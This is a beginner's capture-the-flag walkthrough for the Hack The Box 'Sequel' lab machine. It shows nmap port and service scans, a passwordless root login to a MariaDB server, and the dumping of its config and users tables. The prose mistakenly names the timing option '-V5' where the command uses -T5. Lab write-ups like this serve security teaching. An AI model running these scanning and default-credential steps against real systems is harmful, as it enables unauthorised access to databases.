The aim of this walkthrough is to provide help with the Sequel machine on the Hack The Box website. Please note that no flags are directly provided here. Moreover, be aware that this is only one of the many ways to solve the challenges.
It belongs to a series of tutorials that aim to help out complete beginners with finishing the Starting Point TIER 1 challenges.
SETUP
There are a couple of ways to connect to the target machine. The one we will be using throughout this walkthrough is via the provided pwnbox.
Once our connection is taken care of, we spawn the target machine.
Additionally - even though not required - it is possible to set a local variable (only available in the current shell) containing our target host’s IP address. Once set, we can easily access it by prepending a $ to our variable name.
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $rhost=<target-hosts-ip>
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $ echo $rhost
<target-hosts-ip>
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $
You could use the unset command to remove it after you no longer need it.
┌─[✗]─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $unset rhost
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $
TASK 1
Question: During our scan, which port do we find serving MySQL?
Let’s start our recon with an all-port nmap scan. Use the -V5 option to set the timing template to the fastest.
┌─[htb-bluewalle@htb-nn4sxa7ryy]─[~/Desktop]
└──╼ $nmap -p- -T5 $rhost
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-05 20:46 BST
Warning: 10.129.17.29 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.129.17.29
Host is up (0.037s latency).
Not shown: 62285 closed tcp ports (conn-refused), 3249 filtered tcp ports (no-response)
PORT STATE SERVICE
3306/tcp open mysql
Nmap done: 1 IP address (1 host up) scanned in 69.04 seconds
┌─[htb-bluewalle@htb-nn4sxa7ryy]─[~/Desktop]
└──╼ $
3306
TASK 2
Question: What community-developed MySQL version is the target running?
Well, running nmap with the -sV to detect the service and it’s version does not help us (program hangs).
┌─[htb-bluewalle@htb-nn4sxa7ryy]─[~/Desktop]
└──╼ $nmap -p 3306 -sV $rhost -vvv
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-05 21:02 BST
NSE: Loaded 45 scripts for scanning.
Initiating Ping Scan at 21:02
Scanning 10.129.17.29 [2 ports]
Completed Ping Scan at 21:02, 0.01s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:02
Completed Parallel DNS resolution of 1 host. at 21:02, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 21:02
Scanning 10.129.17.29 [1 port]
Discovered open port 3306/tcp on 10.129.17.29
Completed Connect Scan at 21:02, 0.01s elapsed (1 total ports)
Initiating Service scan at 21:02
Scanning 1 service on 10.129.17.29
...
We try again, but this time we only run scripts from the safe category (--script=safe option).
┌─[htb-bluewalle@htb-nn4sxa7ryy]─[~/Desktop]
└──╼ $nmap -p 3306 --script=safe $rhost
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-05 21:13 BST
Pre-scan script results:
|_http-robtex-shared-ns: *TEMPORARILY DISABLED* due to changes in Robtex's API. See https://www.robtex.com/api/
| targets-asn:
|_ targets-asn.asn is a mandatory parameter
|_broadcast-wpad-discover: Failed to retrieve wpad.dat (http://wpad.com/wpad.dat) from server
|_hostmap-robtex: *TEMPORARILY DISABLED* due to changes in Robtex's API. See https://www.robtex.com/api/
Nmap scan report for 10.129.17.29
Host is up (0.013s latency).
PORT STATE SERVICE
3306/tcp open mysql
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
| Thread ID: 124
| Capabilities flags: 63486
| Some Capabilities: IgnoreSpaceBeforeParenthesis, InteractiveClient, LongColumnFlag, Speaks41ProtocolOld, DontAllowDatabaseTableColumn, ConnectWithDatabase, IgnoreSigpipes, Support41Auth, Speaks41ProtocolNew, SupportsLoadDataLocal, ODBCClient, SupportsTransactions, SupportsCompression, FoundRows, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
| Status: Autocommit
| Salt: zP_k{KAG}dYsW;_L>1{<
|_ Auth Plugin Name: mysql_native_password
Host script results:
| port-states:
| tcp:
|_ open: 3306
| unusual-port:
|_ WARNING: this script depends on Nmap's service/version detection (-sV)
| dns-blacklist:
| SPAM
|_ l2.apews.org - FAIL
|_fcrdns: FAIL (No PTR record)
Post-scan script results:
| reverse-index:
|_ 3306/tcp: 10.129.17.29
Nmap done: 1 IP address (1 host up) scanned in 112.12 seconds
┌─[htb-bluewalle@htb-nn4sxa7ryy]─[~/Desktop]
└──╼ $
MariaDB
TASK 3
Question: When using the MySQL command line client, what switch do we need to use in order to specify a login username?
Using the program’s built-in help can help us identifying the correct options we need to use.
┌─[htb-bluewalle@htb-nn4sxa7ryy]─[~/Desktop]
└──╼ $mysql --help
mysql Ver 15.1 Distrib 10.5.19-MariaDB, for debian-linux-gnu (x86_64) using EditLine wrapper
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Usage: mysql [OPTIONS] [database]
...
-u, --user=name User for login if not current user.
...
┌─[htb-bluewalle@htb-nn4sxa7ryy]─[~/Desktop]
└──╼ $
-u
TASK 4
Question: Which username allows us to log into this MariaDB instance without providing a password?
Why not try some default credentials?
─[htb-bluewalle@htb-nn4sxa7ryy]─[~/Desktop]
└──╼ $mysql -h $rhost -u root
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 147
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
root
TASK 5
Question: In SQL, what symbol can we use to specify within the query that we want to display everything inside a table?
Reading up a bit on sql should provide you with the desired answer.
*
TASK 6
Question: In SQL, what symbol do we need to end each query with?
It is literally displayed by the MariaDB welcome message.
;
TASK 7
Question: There are three databases in this MySQL instance that are common across all MySQL instances. What is the name of the fourth that’s unique to this host?
Use the show command to list out all the available databases.
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| htb |
| information_schema |
| mysql |
| performance_schema |
+--------------------+
4 rows in set (0.014 sec)
MariaDB [(none)]>
From these, the only one that particularly stands out is the htb database.
htb
SUBMIT FLAG
Question: Submit root flag
Try and dump the contents of the htb database. One way to do this is to first select the htb database and then list all it’s tables.
MariaDB [(none)]> use htb
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [htb]> show tables;
+---------------+
| Tables_in_htb |
+---------------+
| config |
| users |
+---------------+
2 rows in set (0.011 sec)
MariaDB [htb]>
Dump all the data in the tables. Use the information obtained in the previous tasks to solve this.
| useful information | task |
|---|---|
| usage of * | TASK5 |
| usage of ; | TASK6 |
| targeted database | TASK7 |
The only missing piece of information is the select command which we can easily look up online.
MariaDB [htb]> select * from config;
+----+-----------------------+----------------------------------+
| id | name | value |
+----+-----------------------+----------------------------------+
| 1 | timeout | 60s |
| 2 | security | default |
| 3 | auto_logon | false |
| 4 | max_size | 2M |
| 5 | flag | <flag> |
| 6 | enable_uploads | false |
| 7 | authentication_method | radius |
+----+-----------------------+----------------------------------+
7 rows in set (0.012 sec)
MariaDB [htb]> select * from users;
+----+----------+------------------+
| id | username | email |
+----+----------+------------------+
| 1 | admin | admin@sequel.htb |
| 2 | lara | lara@sequel.htb |
| 3 | sam | sam@sequel.htb |
| 4 | mary | mary@sequel.htb |
+----+----------+------------------+
4 rows in set (0.012 sec)
MariaDB [htb]>
The flag is in the config table.
flag
Make sure to terminate the target box before you continue with the next machine!